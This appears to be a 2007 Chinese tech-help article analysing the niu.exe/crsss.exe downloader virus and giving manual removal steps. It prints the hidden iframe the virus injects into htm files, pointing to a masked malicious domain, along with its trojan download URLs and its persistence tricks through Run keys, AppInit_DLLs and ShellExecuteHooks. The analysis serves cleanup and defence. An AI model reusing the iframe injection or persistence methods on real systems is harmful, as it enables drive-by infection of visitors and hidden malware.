WD1X.COM - 问答一下,轻松解决,电脑应用解决专家
主板显卡CPU内存显示器
硬盘维修显卡维修显示器维修
注册表系统命令DOS命令Win8
存储光存储鼠标键盘
内存维修打印机维修
WinXPWin7Win11Linux
硬件综合机箱电源散热器手机数码
主板维修CPU维修键盘鼠标维修
Word教程Excel教程PowerPointWPS
网络工具系统工具图像工具
数据库javascript服务器
PHP教程CSS教程XML教程

niu.exe,crsss.exe感染型下载者病毒的分析解决

更新时间:2007-07-21 08:44 作者:清新阳光点击:

病毒运行后:
文件变化:
释放文件C:\WINDOWS\system32\crsss.exe
在每个分区下面释放
autorun.inf和niu.exe 右键菜单无变化

遍历所有分区的htm文件
在其后面 插入代码<IfrAmE src=http://www.xxxxxx.cn/htm/htm.htm width=0 height=0></IfrAmE>
遍历所有分区 删除*.gho文件
删除C:\WINDOWS\system32\verclsid.exe

注册表变化
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
下添加<crsss><C:\WINDOWS\system32\crsss.exe>    [] 达到开机启动的目的
修改HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue
为0x00000001
达到 屏蔽隐藏文件显示的目的
在HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WindowsUpdate下面增加
DisableWindowsUpdateAccess键 并把其键值设为00000001 关闭windows自动更新功能

如果无连接网络 还有如下变化
不断暴力写HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page为 www.hao123.com
并且修改HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage 的值为00000001
使得IE主页修改按钮失效

如果连接网络则为如下变化
下载http://www.xxxxxx.cn/htm/IEURL.txt到系统文件夹
该文本内为一网址 那么上面的被修改的主页则变为此文本中的网址

下载http://www.xxxxxx.cn/htm/exe.txt到系统文件夹 读取里面的内容
下载木马
http://www.xxxxxx.cn/xp/WindowsXP-KB888303-x86-CHS.exe
http://www.xxxxxx.cn/xp/WindowsXP-KB838201-x86-CHS.exe
http://www.xxxxxx.cn/xp/WindowsXP-KB284303-x86-CHS.exe
http://www.xxxxxx.cn/xp/WindowsXP-KB398305-x86-CHS.exe
http://www.xxxxxx.cn/xp/WindowsXP-KB983306-x86-CHS.exe
http://www.xxxxxx.cn/xp/WindowsXP-KB828301-x86-CHS.exe
http://www.xxxxxx.cn/xp/WindowsXP-KB328207-x86-CHS.exe
http://www.xxxxxx.cn/xp/WindowsXP-KB138308-x86-CHS.exe
http://www.xxxxxx.cn/xp/WindowsXP-KB238104-x86-CHS.exe
http://www.xxxxxx.cn/xp/WindowsXP-KB284302-x86-CHS.exe
http://www.xxxxxx.cn/xp/WindowsXP-KB468603-x86-CHS.exe
http://www.xxxxxx.cn/xp/WindowsXP-KB878206-x86-CHS.exe
http://www.xxxxxx.cn/xp/WindowsXP-KB423807-x86-CHS.exe
http://www.xxxxxx.cn/xp/WindowsXP-KB138309-x86-CHS.exe
到系统文件夹 分别命名为0temp.exe~13temp.exe

木马生成物下面将列出 其他一些变化
0temp.exe修改系统时间为1987年10月18日
1temp.exe比较有意思 1temp.exe运行以后会自动关闭瑞星防火墙 瑞星杀毒软件监控 卡卡上网安全助手的ie防漏墙
等    而此关闭并非结束进程 而是相当于用户的手动按软件上的停止保护(如图) 但再次运行该文件后 相关保护又会被开启


具体原理不懂 希望高手指教

木马植入完毕后 生成文件如下
C:\WINDOWS\system32\10temp.DAT
C:\WINDOWS\system32\7temp.DAT
C:\WINDOWS\system32\Autorun.inf
C:\WINDOWS\system32\c.txt
C:\WINDOWS\system32\drivers\svchost.exe
C:\WINDOWS\system32\d.txt
C:\WINDOWS\system32\dhbini.dll
C:\WINDOWS\system32\dhbpri.dll
C:\WINDOWS\system32\nwizqjsj.exe
C:\WINDOWS\system32\RemoteDbg.dll
C:\WINDOWS\system32\test1.txt
C:\WINDOWS\system32\TIMHost.dll
C:\WINDOWS\system32\WinForm.dll
C:\WINDOWS\system32\ztgini.dll
C:\WINDOWS\system32\ztgpri.dll
C:\WINDOWS\TIMHost.exe
C:\WINDOWS\WinForm.exe
%temp%\tlso.exe
%temp%\zxzo0.dll
%temp%\tlso0.dll
C:\Program Files\Internet Explorer\PLUGINS\System64.Sys

sreng日志如下
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
<crsss><C:\WINDOWS\system32\crsss.exe>    []
      <WinForm><C:\WINDOWS\WinForm.exe>    []
      <tlsa><C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tlso.exe>    []
      <TIMHost><C:\WINDOWS\TIMHost.exe>    []
      <KVP><C:\WINDOWS\system32\drivers\svchost.exe>    []
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows]
      <AppInit_DLLs><dhbpri.dll>    []
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
      <{754FB7D8-B8FE-4810-B363-A788CD060F1F}><C:\Program Files\Internet Explorer\PLUGINS\System64.Sys>    []
      <{22311A42-AC1B-158F-FD32-5674345F23A2}><C:\WINDOWS\system32\dhbpri.dll>    []
      <{71351752-5628-1547-FFAB-BADC13512AF7}><C:\WINDOWS\system32\ztgpri.dll>    []
服务
[Remote Debug Service / RemoteDbg][Stopped/Auto Start]
    <C:\WINDOWS\system32\rundll32.exe RemoteDbg.dll,input><Microsoft Corporation>

解决方法:

1.首先把系统时间改回来

2.修改 C:\WINDOWS\system32\dhbpri.dll和C:\WINDOWS\system32\ztgpri.dll文件名为其他名称

3.重启计算机进入安全模式(开机后不断 按F8键    然后出来一个高级菜单 选择第一项 安全模式 进入系统)

打开sreng(该软件可到down.wd1x.com下载)

启动项目    注册表 删除如下项目
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
<crsss><C:\WINDOWS\system32\crsss.exe>    []
      <WinForm><C:\WINDOWS\WinForm.exe>    []
      <tlsa><C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tlso.exe>    []
      <TIMHost><C:\WINDOWS\TIMHost.exe>    []
      <KVP><C:\WINDOWS\system32\drivers\svchost.exe>    []
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
      <{754FB7D8-B8FE-4810-B363-A788CD060F1F}><C:\Program Files\Internet Explorer\PLUGINS\System64.Sys>    []
    <{22311A42-AC1B-158F-FD32-5674345F23A2}><C:\WINDOWS\system32\dhbpri.dll>    []
      <{71351752-5628-1547-FFAB-BADC13512AF7}><C:\WINDOWS\system32\ztgpri.dll>    []

双击AppInit_DLLs 把其键值改为空
“启动项目”-“服务”-“Win32服务应用程序”中点“隐藏经认证的微软项目”,
选中以下项目,点“删除服务”,再点“设置”,在弹出的框中点“否”:
Remote Debug Service / RemoteDbg

系统修复-Windows shell/IE 选中
设置主页为"about:blank"和允许Internet Explorer选项窗口和选项窗口的所有内容
然后点击下面的修复


把下面的代码拷入记事本中然后另存为1.reg文件

 Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
"RegPath"="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced"
"Text"="@shell32.dll,-30500"
"Type"="radio"
"CheckedValue"=dword:00000001
"ValueName"="Hidden"
"DefaultValue"=dword:00000002
"HKeyRoot"=dword:80000001
"HelpID"="shell.hlp#51105"

双击1.reg把这个注册表项导入

双击我的电脑,工具,文件夹选项,查看,单击选取"显示隐藏文件或文件夹" 并清除"隐藏受保护的操作系统文件(推荐)"前面的钩。在提示确定更改时,单击“是” 然后确定
点击    菜单栏下方的 文件夹按钮(搜索右边的按钮)
从左边的资源管理器 进入C盘
删除如下文件(如遇提示无法删除文件,到down.wd1x.com下载费尔木马强制删除器工具进行强制删除)
C:\WINDOWS\system32\10temp.DAT
C:\WINDOWS\system32\7temp.DAT
C:\WINDOWS\system32\Autorun.inf
C:\WINDOWS\system32\c.txt
C:\WINDOWS\system32\drivers\svchost.exe
C:\WINDOWS\system32\d.txt
C:\WINDOWS\system32\dhbini.dll
C:\WINDOWS\system32\dhbpri.dll改完名称的文件
C:\WINDOWS\system32\nwizqjsj.exe
C:\WINDOWS\system32\RemoteDbg.dll
C:\WINDOWS\system32\test1.txt
C:\WINDOWS\system32\TIMHost.dll
C:\WINDOWS\system32\WinForm.dll
C:\WINDOWS\system32\ztgini.dll
C:\WINDOWS\system32\ztgpri.dll改完名称的文件
C:\WINDOWS\TIMHost.exe
C:\WINDOWS\WinForm.exe
%temp%\tlso.exe
%temp%\zxzo0.dll
%temp%\tlso0.dll
C:\Program Files\Internet Explorer\PLUGINS\System64.Sys
C:\WINDOWS\system32\crsss.exe
C:\autorun.inf
C:\niu.exe
从左边的资源管理器 进入其他分区 删除autorun.inf和niu.exe

到down.wd1x.com下载iframekill.rar,使用该工具清理被感染的htm等文件

顶一下
(0)
0%
踩一下
(0)
0%
------分隔线----------------------------
你可能感兴趣的内容